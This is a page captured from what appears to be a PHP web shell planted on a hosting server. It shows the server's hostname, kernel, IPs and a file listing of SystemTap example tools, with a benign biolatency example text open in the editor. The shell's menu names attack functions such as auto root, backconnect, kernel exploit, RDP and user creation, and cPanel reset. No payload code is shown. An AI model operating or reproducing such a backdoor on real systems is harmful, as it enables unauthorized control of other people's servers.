Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
lwtools /
[ HOME SHELL ]
Name
Size
Permission
Action
README
107
B
-rw-r--r--
accept2close-nd.8
1.39
KB
-rw-r--r--
accept2close-nd.meta
640
B
-rw-r--r--
accept2close-nd.stp
1.76
KB
-rwxr-xr-x
accept2close-nd.txt
3.31
KB
-rw-r--r--
biolatency-nd.8
1.63
KB
-rw-r--r--
biolatency-nd.meta
663
B
-rw-r--r--
biolatency-nd.stp
2.02
KB
-rwxr-xr-x
biolatency-nd_example.txt
7.19
KB
-rw-r--r--
bitesize-nd.8
1.13
KB
-rw-r--r--
bitesize-nd.meta
491
B
-rw-r--r--
bitesize-nd.stp
1.51
KB
-rwxr-xr-x
bitesize-nd_example.txt
3.35
KB
-rw-r--r--
execsnoop-nd.8
1.21
KB
-rw-r--r--
execsnoop-nd.meta
610
B
-rw-r--r--
execsnoop-nd.stp
1.25
KB
-rwxr-xr-x
execsnoop-nd_example.txt
2.52
KB
-rw-r--r--
fslatency-nd.8
1.88
KB
-rw-r--r--
fslatency-nd.meta
700
B
-rw-r--r--
fslatency-nd.stp
3.81
KB
-rwxr-xr-x
fslatency-nd_example.txt
13.07
KB
-rw-r--r--
fsslower-nd.8
1.71
KB
-rw-r--r--
fsslower-nd.meta
662
B
-rw-r--r--
fsslower-nd.stp
3.55
KB
-rwxr-xr-x
fsslower-nd_example.txt
1.89
KB
-rw-r--r--
killsnoop-nd.8
1.1
KB
-rw-r--r--
killsnoop-nd.meta
424
B
-rw-r--r--
killsnoop-nd.stp
1.25
KB
-rwxr-xr-x
killsnoop-nd_example.txt
1.86
KB
-rw-r--r--
opensnoop-nd.8
1.24
KB
-rw-r--r--
opensnoop-nd.meta
397
B
-rw-r--r--
opensnoop-nd.stp
1
KB
-rwxr-xr-x
opensnoop-nd_example.txt
1.1
KB
-rw-r--r--
rwtime-nd.8
1.12
KB
-rw-r--r--
rwtime-nd.meta
449
B
-rw-r--r--
rwtime-nd.stp
1.56
KB
-rwxr-xr-x
rwtime-nd_example.txt
4.09
KB
-rw-r--r--
syscallbypid-nd.8
1.06
KB
-rw-r--r--
syscallbypid-nd.meta
447
B
-rw-r--r--
syscallbypid-nd.stp
1.07
KB
-rwxr-xr-x
syscallbypid-nd_example.txt
9.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : biolatency-nd_example.txt
Examples of biolatency-nd.stp, the Linux SystemTap version. Measuring block I/O (storage I/O, ie, disk I/O) latency until Ctrl-C: # ./biolatency-nd.stp Tracing block I/O... Hit Ctrl-C to end. ^C bio latency (ns): value |-------------------------------------------------- count 131072 | 0 262144 | 0 524288 |@@ 5 1048576 |@@ 4 2097152 |@@@@@@@@@@@@@@@@@@@@@@@@ 49 4194304 |@@@@@@@@@@@@@@@@@@@@@@@@@@@ 55 8388608 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 82 16777216 |@@@@@@@@@@@@@@@@@@ 37 33554432 | 0 67108864 | 0 This shows a distribution between aout 1 and 16 milliseconds, which is expected for current rotational disk I/O. A more interesting distribution: # ./biolatency-nd.stp Tracing block I/O... Hit Ctrl-C to end. ^C bio latency (ns): value |-------------------------------------------------- count 32768 | 0 65536 | 0 131072 | 10 262144 |@@@@@@@@@ 450 524288 |@@@ 159 1048576 | 26 2097152 | 35 4194304 | 18 8388608 |@@ 112 16777216 |@@@@ 195 33554432 |@@@@@@@@@ 452 67108864 |@@@@@@@@@@@@@@@@@@@@@@ 1065 134217728 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 2398 268435456 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 2008 536870912 | 0 1073741824 | 0 This shows a bimodal distribution with a low-latency mode around 0.26 milliseconds, which may be on-disk cache hits, and then a high-latency mode between around 16 and 268 milliseconds. Such high latency is likely caused by queueing, which can be investigated further using custom SystemTap invocations as well as the "avgqu-sz" column from iostat(1). biolatency-nd.stp accepts an optional interval and count as arguments. Measuring block I/O latency, and printing a report every second, five times: # ./biolatency-nd.stp 1 5 Tracing block I/O... Output every 1 secs. bio latency (ns): value |-------------------------------------------------- count 32768 | 0 65536 | 0 131072 |@@ 28 262144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 486 524288 |@@@@@@@@@@@@@@@@@@@ 198 1048576 |@@@@@@@@@ 98 2097152 |@@@@@@ 61 4194304 |@@@ 35 8388608 |@ 17 16777216 | 3 33554432 | 0 67108864 | 0 bio latency (ns): value |-------------------------------------------------- count 32768 | 0 65536 | 0 131072 |@@ 22 262144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 505 524288 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 370 1048576 |@@@@@@@@ 91 2097152 |@@ 31 4194304 |@ 20 8388608 |@ 20 16777216 | 4 33554432 | 0 67108864 | 0 bio latency (ns): value |-------------------------------------------------- count 32768 | 0 65536 | 0 131072 |@@@@ 70 262144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 826 524288 |@@@@@@@@@@@@@@@@@@@ 333 1048576 |@@@ 52 2097152 | 11 4194304 | 7 8388608 |@ 17 16777216 | 5 33554432 | 0 67108864 | 0 bio latency (ns): value |-------------------------------------------------- count 32768 | 0 65536 | 0 131072 |@@ 35 262144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 559 524288 |@@@@@@@@@@@@@@@@@@@@@@ 270 1048576 |@@@@@@ 82 2097152 |@@ 34 4194304 |@ 17 8388608 |@ 19 16777216 | 9 33554432 | 2 67108864 | 0 134217728 | 0 bio latency (ns): value |-------------------------------------------------- count 32768 | 0 65536 | 0 131072 |@@@ 57 262144 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 877 524288 |@@@@@@@@@@@@@@@ 270 1048576 |@@@@ 85 2097152 |@@ 46 4194304 | 7 8388608 | 15 16777216 | 10 33554432 | 0 67108864 | 0 These disk I/O were much faster, with a mode around 0.25 ms.
Close